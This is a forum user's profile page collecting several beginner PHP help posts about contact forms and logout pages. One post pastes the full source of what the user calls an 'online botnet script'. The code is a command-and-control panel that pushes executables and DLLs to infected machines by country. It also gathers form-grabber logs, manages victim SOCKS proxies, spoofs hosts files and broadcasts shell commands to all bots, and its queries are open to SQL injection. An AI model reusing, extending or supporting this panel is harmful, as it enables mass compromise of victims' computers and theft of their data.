Jump to content

soumikr

Members
  • Posts

    10
  • Joined

  • Last visited

soumikr's Achievements

Newbie

Newbie (1/5)

0

Reputation

  1. sir i just want a form with username email password image and content field for posting my users data and which will auto show in my website, plz help me i am very noob
  2. k help me here i have all html and php code but it not work dont know why html code <!DOCTYPE html> <html lang="en"> <head> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1"> <!-- Bootstrap --> <link href="css/bootstrap.min.css" rel="stylesheet"> <link href="css/bootstrap-theme.css" rel="stylesheet"> <link href="css/theme.css" rel="stylesheet"> <!-- HTML5 Shim and Respond.js IE8 support of HTML5 elements and media queries --> <!-- WARNING: Respond.js doesn't work if you view the page via file:// --> <!--[if lt IE 9]> <script src="https://oss.maxcdn.com/html5shiv/3.7.2/html5shiv.min.js"></script> <script src="https://oss.maxcdn.com/respond/1.4.2/respond.min.js"></script> <![endif]--> </head> <body> <form class="form-horizontal" action="send_email.php" method="post" enctype="multipart/form-data" name="Contact" id="Contact"> <fieldset> <div class="form-group"> <label class="col-md-4 control-label" for="Name">Name</label> <div class="col-md-4"> <input id="Name" name="Name" placeholder="Your Name" class="form-control input-md" type="text"> </div> </div> <!-- Text input--> <div class="form-group"> <label class="col-md-4 control-label" for="Email">Email</label> <div class="col-md-4"> <input id="Email" name="Email" placeholder="Your Email Address" class="form-control input-md" required="" type="text"> </div> </div> <!-- Select Basic --> <div class="form-group"> <label class="col-md-4 control-label" for="Phone">Phone</label> <div class="col-md-4"> <input id="Phone" name="Phone" class="form-control"> </div> </div> <!-- Textarea --> <div class="form-group"> <label class="col-md-4 control-label" for="Message">Message</label> <div class="col-md-4"> <textarea class="form-control" id="message" name="message">How can we help you?</textarea> </div> </div> <!-- Button --> <div class="form-group"> <label class="col-md-4 control-label" for="Send"></label> <div class="col-md-4"> <button id="Send" name="Send" class="btn btn-info">Send</button> </div> </div> </fieldset> </form> <!-- jQuery (necessary for Bootstrap's JavaScript plugins) --> <script src="https://ajax.googleapis.com/ajax/libs/jquery/1.11.1/jquery.min.js"></script> <!-- Include all compiled plugins (below), or include individual files as needed --> <script src="js/bootstrap.min.js"></script> </body> </html> php code <?php if(isset($_POST['email'])) { // EDIT THE 2 LINES BELOW AS REQUIRED $email_to = "soumikr29@gmail.com"; $email_subject = "Customer Inqkjuiry"; function died($error) { // your error code can go here echo "We are very sorry, but there were error(s) found with the form you submitted. "; echo "These errors appear below.<br /><br />"; echo $error."<br /><br />"; echo "Please go back and fix these errors.<br /><br />"; die(); } // validation expected data exists if(!isset($_POST['name']) || !isset($_POST['email']) || !isset($_POST['phone']) || !isset($_POST['message'])) { died('We are sorry, but there appears to be a problem with the form you submitted.'); } $name = $_POST['name']; // required $email_from = $_POST['email']; // required $phone = $_POST['phone']; // not required $message = $_POST['message']; // required $error_message = ""; $email_exp = '/^[A-Za-z0-9._%-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,4}$/'; if(!preg_match($email_exp,$email_from)) { $error_message .= 'The Email Address you entered does not appear to be valid.<br />'; } $string_exp = "/^[A-Za-z .'-]+$/"; if(!preg_match($string_exp,$name)) { $error_message .= 'The First Name you entered does not appear to be valid.<br />'; } if(strlen($message) < 2) { $error_message .= 'The message you entered do not appear to be valid.<br />'; } if(strlen($error_message) > 0) { died($error_message); } $email_message = "Form details below.\n\n"; function clean_string($string) { $bad = array("content-type","bcc:","to:","cc:","href"); return str_replace($bad,"",$string); } $email_message .= "Name: ".clean_string($name)."\n"; $email_message .= "Email: ".clean_string($email_from)."\n"; $email_message .= "phone: ".clean_string($phone)."\n"; $email_message .= "message: ".clean_string($message)."\n"; // create email headers $headers = 'From: '.$email_from."\r\n". 'Reply-To: '.$email_from."\r\n" . 'X-Mailer: PHP/' . phpversion(); @mail($email_to, $email_subject, $email_message, $headers); ?> <!-- include your own success html here --> Thank you for contacting us. We will be in touch with you very soon. <?php } ?> but email not sent sir here is the full download link of the code http://www.creativebeacon.com/bootstrap_form_10-09.zip
  3. ya sir, and i make that div for design purpose
  4. i want to receive email, i will use it in my contact us page
  5. sir i need this contact form php code to make it work, i make thi deign for my website but dont know what have to put in send.php here i the code <h4>Send a Message</h4> <div class="contact-form" method="post" action="send.php"> <form role="form"> <div class="form-group"> <label for="name">Name</label> <input type="text" name="name" placeholder="" id="name" class="form-control"> </div> <div class="form-group"> <label for="email">Email</label> <input type="text" name="email" placeholder="" id="email" class="form-control"> </div> <div class="form-group"> <label for="phone">Skype</label> <input type="text"name="subject" id="phone" class="form-control"> </div> <div class="form-group"> <label for="phone">Message</label> <textarea placeholder="" name="message" rows="5" class="form-control"></textarea> </div> <button class="btn btn-danger" type="submit">Submit</button> </form>
  6. plz sir help me to make the logout page
  7. me use this but its cant be logout <html> <head> <title> </title> </head> <body> <?php function logoutFromHTTP() { unset($_SERVER['PHP_AUTH_USER']); unset($_SERVER['PHP_AUTH_PW']); } logoutFromHTTP(); print "Logout Successfull"; ?> </body> </html>
  8. its a online botnet script. i want to make a logout page for it
  9. hi guys i want to make a logout page of this page which i past it here. <?php error_reporting(0); require("./inc/cfg.php"); require("./inc/funcs.php"); $dbase = new dbClass(); $page = $_GET["page"]; $act = $_GET["act"]; $id = $_GET["id"]; $fileid = $_GET["file"]; $next = $_GET["next"]; $referrer = $_SERVER['HTTP_REFERER']; if(!isset($_SERVER['PHP_AUTH_USER']) || $_SERVER['PHP_AUTH_USER'] !== $config["admin"] || $_SERVER['PHP_AUTH_PW'] !== $config["pass"]) { header('WWW-Authenticate: Basic realm="Who are you?"'); header('HTTP/1.0 401 Unauthorized'); exit; } if ($act == "del" && !empty($id)) { mysql_query("DELETE FROM sellers WHERE id='".$id."'"); @unlink('./exe/'.$id.'.tmp'); header('Location: '.$referrer); } if ($act == "stop" && !empty($id)) { mysql_query("UPDATE sellers SET stop='1' WHERE id='".$id."'"); header('Location: '.$referrer); } if ($act == "resume" && !empty($id)) { mysql_query("UPDATE sellers SET stop='0' WHERE id='".$id."'"); header('Location: '.$referrer); } if ($act == "dwnlog" && !empty($fileid)) { getlog($fileid); header('Location: '.$referrer); } if ($act == "dellog" && !empty($fileid)) { @unlink('./data/'.$fileid); header('Location: '.$referrer); } if ($act == "dwnshell" && !empty($fileid)) { getshell($fileid); header('Location: '.$referrer); } if ($act == "delshell" && !empty($fileid)) { @unlink('./shell/'.$fileid); header('Location: '.$referrer); } ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head profile="http://gmpg.org/xfn/11"> <title>Control Panel</title> <link rel="stylesheet" href="/exe/bootstrap.css" type="text/css" /> <script> function look(type){ param=document.getElementById(type); if(param.style.display == "none") param.style.display = "block"; else param.style.display = "none" } function showdiv(id,param){ document.getElementById('botid_num1').value = param; document.getElementById('botid_num2').value = param; display = document.getElementById(id).style.display; if(display=='none'){document.getElementById(id).style.display='block';} else{document.getElementById(id).style.display='none';} } </script> </head> <body> <font face="Tahoma"> <div class="navbar navbar-fixed-top"> <div class="navbar-inner"> <div class="container"> <a class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse"> <span class="icon-bar"></span> <span class="icon-bar"></span> <span class="icon-bar"></span> </a> <a class="brand" href="/bot/control.php"><img src="/bot/imgs/1.png" alt="HTML tutorial" width="110" height="23"></a> <ul class="nav pull-right"> </ul> <div class="nav-collapse"> <ul class="nav"> <li><a href="?page=index">STATISTICS</a></li> <li><a href="?page=bots">BOTS</a></li> <li><a href="?page=exe">TASKS</a></li> <li><a href="?page=options">UPLOADER</a></li> <li><a href="?page=logs">FORM GRABBER</a></li> <li><a href="?page=socks">SOCKS</a></li> <li><a href="?page=hosts">HOSTS</a></li> <li><a href="?page=shell">COMMAND PROMPT</a></li> <!--<li><a href="/secret/index.php?mod=sconfig">Dynamic Configuration</a></li>--> </ul> </li> </ul> </ul> </div><!--/.nav-collapse --> </div> </div> </div> <script src="http://itinfosys.net/js/jquery.min.js"></script> <p>.</p> <p>.</p> <p>.</p> <body background="http://dxg-mathias.info/bot/imgs/k.jpg"> <div class="data"> <?php if ($act == "edit" && !empty($id)) { $v = mysql_query("SELECT * FROM sellers WHERE id='".$id."'"); $load = mysql_fetch_assoc($v); if ($load["isdll"]==0) $checked1="checked"; if ($load["isdll"]==1) $checked2="checked"; if ($load["isdll"]==2) $checked3="checked"; echo '<table cellpadding="3" cellspacing="0" align="center"> <tr> <td align="center" style="width:100%;"> <h3 style="margin-top:20px;margin-bottom:20px;">Edit task with ID#'.$id.'</h3> </td> </tr> <tr> <td align="left" style="width:100%;"><h4>Local file:</h4><br> <form method="post" enctype="multipart/form-data" action="action.php"> <input type="hidden" name="edit" value="yes"> <input type="hidden" name="id" value="'.$id.'"> GEO: <input type="input" name="geo" value="'.$load["country"].'"> (ex.: ru,us,gb)<br><br> Limit: <input type="input" name="limit" value="'.$load["limit"].'" size="8" max="7"> Seller: <input type="input" name="seller" value="'.$load["seller"].'" size="8" max="5"><br><br> <input type="file" name="file"> <input type="submit" value="Upload"><br><br> <table cols="3" width="300px"> <tr> <td><input type="radio" name="start" value="0" '.$checked1.'>Run as EXE</td> <td><input type="radio" name="start" value="1" '.$checked2.'>LoadLibrary</td> <td><input type="radio" name="start" value="2" '.$checked3.'>regsvr32</td> </tr> </table> </form> </td> </tr> <tr> <td align="left" style="width:100%;"><h4>Remote file:</h4><br> <form method="post" enctype="multipart/form-data" action="action.php"> <input type="hidden" name="edit" value="remote"> <input type="hidden" name="id" value="'.$id.'"> GEO: <input type="input" name="geo" value="'.$load["country"].'"> (ex.: ru,us,gb)<br><br> Limit: <input type="input" name="limit" value="'.$load["limit"].'" size="8" max="7"> Seller: <input type="input" name="seller" value="'.$load["seller"].'" size="8" max="5"><br><br> URL: <input type="input" name="url" value="'.$load["from"].'"> <input type="submit" value="Set"><br><br> <table cols="3" width="300px"> <tr> <td><input type="radio" name="start" value="0" '.$checked1.'>Run as EXE</td> <td><input type="radio" name="start" value="1" '.$checked2.'>LoadLibrary</td> <td><input type="radio" name="start" value="2" '.$checked3.'>regsvr32</td> </tr> </table> </form> </td> </tr> </table>'; } else { if(empty($page) || $page == "index") { echo '<table cellpadding="0" cellspacing="0" align="center"> <tr> <td align="center" style="width:25%;"> <h3 style="margin-top:20px;margin-bottom:20px;">Statistic</h3> </td> <td align="center" style="width:25%;"> <h3 style="margin-top:20px;margin-bottom:20px;">Operating System</h3> </td> <td align="center" style="width:25%;"> <h3 style="margin-top:20px;margin-bottom:20px;">Online Countries</h3> </td> <td align="center" style="width:25%;"> <h3 style="margin-top:20px;margin-bottom:20px;">Countries</h3> </td> </tr> <tr> <td align="center" style="padding:0;width:200px;"> <table cellspacing="0"> <tr> <td align="left"><b>All Bots</b> - '.bots().'<br> <b>Today</b> - '.tdbots().'<br> <b>Online</b> - '.onbots().'<br><br> <b>EXE</b> - '.tasks().'<br><br> <b>Loads</b> - '.loads().'<br> <b>Runs</b> - '.runs().'<br><br> <b>For update</b> - '.forupd().'<br> <b>Doubles</b> - '.doubles().'</td> </tr> <tr> <td align="center"> <h3 style="margin-top:20px;margin-bottom:20px;">Build ID</h3> </td> </tr> <tr> <td align="center"> <table cellspacing="0">'.sellers().'</table> </td> </tr> </table> </td> <td align="center"> <table cellspacing="0">'.os().'</table> </td> <td align="center"><a class="action" href="javascript:look(\'div1\');">Show/Hide</a><br/><br/><div id="div1" style="display:none"> <table cellspacing="0">'.oncountries().'</table></div> </td> <td align="center"><a class="action" href="javascript:look(\'div2\');">Show/Hide</a><br/><br/><div id="div2" style="display:none"> <table cellspacing="0">'.countries().'</table></div> </td> </tr> </table>'; } elseif ($page == "exe") { echo ' <table cellpadding="3" cellspacing="0" align="center" cols="3" width="650px"> <tr> <td align="center" colspan="3"> <h3 style="margin-top:20px;margin-bottom:20px;">Add new task</h3> </td> </tr> <tr> <td align="left" style="width:300px;"><h4>Local file:</h4><br> <form method="post" enctype="multipart/form-data" action="action.php"> Comment: <input type="input" name="comment"> <br><br> GEO: <input type="input" name="geo" value="ALL"> (ex.: ru,us,gb)<br><br> Limit: <input type="input" name="limit" value="0" size="8" max="7"> <p>Seller: <input type="input" name="seller" value="0" size="8" max="5"><br><br> <input type="file" name="file"> <input type="submit" value="Upload"><br><br> <table cols="3" width="300px"> <tr> <td><input type="radio" name="start" value="0" checked>Run as EXE</td> <td><input type="radio" name="start" value="1">LoadLibrary</td> <td><input type="radio" name="start" value="2">regsvr32</td> </tr> </table> </form> </td> <td style="width:50px;"> </td> <td align="left" style="width:300px;"><h4>Remote file:</h4><br> <form method="post" enctype="multipart/form-data" action="action.php"> Comment: <input type="input" name="comment"> <br><br> GEO: <input type="input" name="geo" value="ALL"> (ex.: ru,us,gb)<br><br> Limit: <input type="input" name="limit" value="0" size="8" max="7"> <p>Seller: <input type="input" name="seller" value="0" size="8" max="5"><br><br></p> URL: <input type="input" name="url"> <input type="submit" value="Set"><br><br> <table cols="3" width="300px"> <tr> <td><input type="radio" name="start" value="0" checked>Run as EXE</td> <td><input type="radio" name="start" value="1">LoadLibrary</td> <td><input type="radio" name="start" value="2">regsvr32</td> </tr> </table> </form> </td> </tr> </table> <table cellpadding="3" cellspacing="0" align="center" cols="13" width="900px"> <tr> <td align="center" colspan="12"> <h3 style="margin-top:20px;margin-bottom:20px;">Task list</h3> </td> </tr> <tr> <td align="center" style="width:25px;"><b>ID</b></td> <td align="center" style="width:50px;"><b>Size</b></td> <td align="center" style="width:130px;"><b>Date</b></td> <td align="center" style="width:50px;"><b>Loads</b></td> <td align="center" style="width:50px;"><b>Runs</b></td> <td align="center" style="width:160px;"><b>Action</b></td> <td align="center" style="width:50px;"><b>Limit</b></td> <td align="center" style="width:75px;"><b>URL</b></td> <td align="center" style="width:30px;"><b>GEO</b></td> <td align="center" style="width:40px;"><b>DLL</b></td> <td align="center" style="width:180px;"><b>Comment</b></td> <td align="center" style="width:35px;"><b>Seller</b></td> <td align="center" style="width:35px;"><b>Guest</b></td> </tr>'.allexe().'</table>'; } elseif ($page == "options") { $v = mysql_query("SELECT * FROM `update`"); $upd = mysql_fetch_assoc($v); $warn =''; if ($upd["from"]=='local') {$warn='<span style="color: red;">Local update is started!!!</span><br>';} elseif (strlen($upd["from"])>10) {$warn='<span style="color: red;">Remote update is started!!!<br>From: '.substr($upd["from"],0,15).'...</span><br>';} $v = mysql_query("SELECT * FROM `options`"); $res = mysql_fetch_assoc($v); $reserve = $res["reserv"]; echo '<table cellpadding="3" cellspacing="0" align="center"> <tr> <td align="center" style="width:100%;"> <h3 style="margin-top:20px;margin-bottom:20px;">Options</h3> </td> </tr> <tr> <td align="center" style="width:100%;"> <a class="action" href="action.php?opt=delexe">Delete all tasks with files</a> | <a class="action" href="action.php?opt=delpers">Delete personal tasks with files</a> | <a class="action" href="action.php?opt=deldoub">Clear doubles counter</a> | <a class="action" href="action.php?opt=delstat">Clear all stat\'s</a> </td> </tr> </table> <table cellpadding="3" cellspacing="0" align="center"> <tr> <td align="center" style="width:100%;"><h3 style="margin-top:20px;margin-bottom:20px;">Update</h3> </td> </tr> <tr> <td><h4 style="margin-top:20px;margin-bottom:20px;">Local file:</h4><br> <form method="post" enctype="multipart/form-data" action="action.php"> <input type="file" name="updname"> <input type="submit" value="Upload"> </form> </td> </tr> <tr> <td><h4 style="margin-top:20px;margin-bottom:20px;">Remote file:</h4><br> <form method="post" enctype="multipart/form-data" action="action.php"> URL: <input type="input" name="update"> <input type="submit" value="Set"> </form> </td> </tr> <tr> <td align="center" style="width:100%;">'.$warn.'<br> <a class="action" href="action.php?opt=delupdate">Delete UPDATE</a> </td> </tr> <tr> <td align="center" style="width:100%;"><h3 style="margin-top:20px;margin-bottom:20px;">Reserve URL</h3> </td> </tr> <tr> <td align="center"> <form method="post" enctype="multipart/form-data" action="action.php"> URL: <input type="input" name="reserve" value="'.$reserve.'"> (e.g.: http://site.com/folder/index.php or "none")<br><br> <input type="submit" value="Set"> </form> </td> </tr> </table>'; } elseif ($page == "bots") { $botlist = ''; if ($_GET['mode']=='search') { $botlist = sr_allbots(); } else { $botlist = allbots($next); } echo '<table cellpadding="3" cellspacing="0" align="center" cols="6" width="950px"> <tr> <td align="center" colspan="6"> <h3 style="margin-top:20px;margin-bottom:20px;">Bots List</h3> </td> </tr> <tr> <td colspan="6" align="left" style="width:950px;"><h4>Search:</h4> <form method="post" enctype="multipart/form-data" action="action.php"> ID (pattern): <input type="input" name="sr_pattern"> | IP: <input type="input" name="sr_ip"> | GEO: <input type="input" name="sr_geo" size="8"> <P> Seller ID: <input type="input" name="sr_seller" size="8"> <input type="hidden" name="mode" value="search"><input type="submit" value="Search"><br><br></P> </form> </td> </tr> <tr> <td align="center" style="width:250px;"><b>ID</b></td> <td align="center" style="width:150px;"><b>IP</b></td> <td align="center" style="width:100px;"><b>OS</b></td> <td align="center" style="width:250px;"><b>Last Visit</b></td> <td align="center" style="width:150px;"><b>Country</b></td> <td align="center" style="width:50px;"><b>Seller</b></td> <td align="center" style="width:100px;"><b>Command</b></td> </tr>'.$botlist.'</table> <div id="personal" style="display: none;"> <div align="right"><a href="#" onclick="showdiv(\'personal\'); return false">Close</a></div> <table cellpadding="3" cellspacing="0" align="center" width="350px"> <tr> <td align="center"><h3 style="margin-top:10px;margin-bottom:20px;">Add personal task</h3></td> </tr> <tr> <td align="left" style="width:300px;"><h4>Local file:</h4><br> <form method="post" enctype="multipart/form-data" action="action.php"> <input type="hidden" id="botid_num1" name="botid" value="0"> <input type="file" name="file"> <input type="submit" value="Upload"><br><br> <table cols="3" width="300px"> <tr> <td><input type="radio" name="start" value="0" checked>Run as EXE</td> <td><input type="radio" name="start" value="1">LoadLibrary</td> <td><input type="radio" name="start" value="2">regsvr32</td> </tr> </table> </form> </td> </tr> <tr> <td align="left" style="width:300px;"><h4>Remote file:</h4><br> <form method="post" enctype="multipart/form-data" action="action.php"> <input type="hidden" id="botid_num2" name="botid" value="0"> URL: <input type="input" name="url"> <input type="submit" value="Set"><br><br> <table cols="3" width="300px"> <tr> <td><input type="radio" name="start" value="0" checked>Run as EXE</td> <td><input type="radio" name="start" value="1">LoadLibrary</td> <td><input type="radio" name="start" value="2">regsvr32</td> </tr> </table> </form> </td> </tr> </table> </div>'; } elseif ($page == "logs") { echo '<table cellpadding="3" cellspacing="0" align="center" cols="3" width="700px"> <tr> <td align="center" style="width:700px;" colspan="3"> <h3 style="margin-top:20px;margin-bottom:20px;">Grabber Logs</h3> </td> </tr> <tr> <td align="center" style="width:200px;"><b>Name</b></td> <td align="center" style="width:200px;"><b>Size</b></td> <td align="center" style="width:300px;"><b>Action</b></td> </tr>'.alllogs().'</table>'; } elseif ($page == "socks") { $v = mysql_query("SELECT valid FROM socksip"); $load = mysql_fetch_assoc($v); if (empty($load['valid'])) {$load['valid']='127.0.0.1';} echo '<table cellpadding="3" cellspacing="0" align="center"> <tr> <td align="center" style="width:100%;"> <h3 style="margin-top:20px;margin-bottom:20px;">Allowed IP\'s</h3> </td> </tr> <tr> <td align="center" style="width:45%;"> <form method="post" action="action.php"> <textarea name="iplist" style="width:300px;" rows="10" cols="30">'.$load['valid'].'</textarea> <br><br> <input type="submit" value="Set"> </form> </td> </tr> <tr> <td> <br> Enter IP-adress whom allowed use socks (ex.: 192.168.1.1 - check your ip) <br> Enter "forall" to allow all IP used socks </td> </tr> </table> <br> <center><a href="action.php?opt=socks" target="_blank">Link to online socks list (ip:port)</a> | <a href="action.php?opt=delsocks">Clear socks list</a></center> <br> <table cellpadding="3" cellspacing="0" align="center" cols="5" width="800px"> <tr> <td align="center" style="width:700px;" colspan="5"> <h3 style="margin-top:20px;margin-bottom:20px;">Socks Online List</h3> </td> </tr> <tr> <td align="center" style="width:250px;"><b>ID</b></td> <td align="center" style="width:150px;"><b>IP</b></td> <td align="center" style="width:50px;"><b>Port</b></td> <td align="center" style="width:200px;"><b>Date</b></td> <td align="center" style="width:150px;"><b>Country</b></td> </tr>'.livesocks($next).'</table>'; } elseif ($page == "hosts") { $v = mysql_query("SELECT hosts FROM socksip"); $load = mysql_fetch_assoc($v); if (empty($load['hosts']) or strlen($load['hosts'])<7) {$load['hosts']='127.0.0.1 localhost';} echo '<table cellpadding="3" cellspacing="0" align="center"> <tr> <td align="center" style="width:100%;"> <h3 style="margin-top:20px;margin-bottom:20px;">Hosts Spoofing</h3> </td> </tr> <tr> <td align="center" style="width:45%;"> <form method="post" action="action.php"> <textarea name="hosts" style="width:500px;" rows="10" cols="30">'.$load['hosts'].'</textarea> <br><br> <input type="submit" value="Set"> </form> </td> </tr> <tr> <td> <br> For spoofing enter: ip domain (ex.: ip = 1.1.1.1, domain = site.com) <br> For restore original HOSTS enter: restore_orig </td> </tr> </table> <table cellpadding="3" cellspacing="0" align="center" cols="2" width="300px"> <tr> <td align="center" style="width:300px;" colspan="2"> <h3 style="margin-top:20px;margin-bottom:20px;">Hosts Spoofing Statistic</h3> </td> </tr> <tr> <td align="center" style="width:150px;"><b>Total Bots</b></td> <td align="center" style="width:150px;"><b>Spoofed</b></td> </tr>'.allspoof().'</table>'; } elseif ($page == "shell") { $v = mysql_query("SELECT shell FROM socksip"); $i = mysql_fetch_assoc($v); $shell = $i['shell']; echo '<table cellpadding="3" cellspacing="0" align="center" cols="3" width="700px"> <tr> <td align="center" style="width:700px;" colspan="3"> <h3 style="margin-top:20px;margin-bottom:20px;">COMMAND PROMT & LOGS</h3> </td> </tr> <tr> <td colspan="3" align="center"> <form method="post" action="action.php"> Command: <input type="input" name="shell_cmd" size="50" value="'.$shell.'"> <input type="submit" value="Set"> </form> <br> Sample command: "ipconfig /all" (all bots send results of this command, enter without quotes) <br><br> </td> </tr> <tr> <td align="center" style="width:200px;"><b>Name</b></td> <td align="center" style="width:200px;"><b>Size</b></td> <td align="center" style="width:300px;"><b>Action</b></td> </tr>'.allshell().'</table>'; } else { echo "Fuck Yeah!!!"; } } ?> </div> </div> </body> </html>
×
×
  • Create New...

Important Information

We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.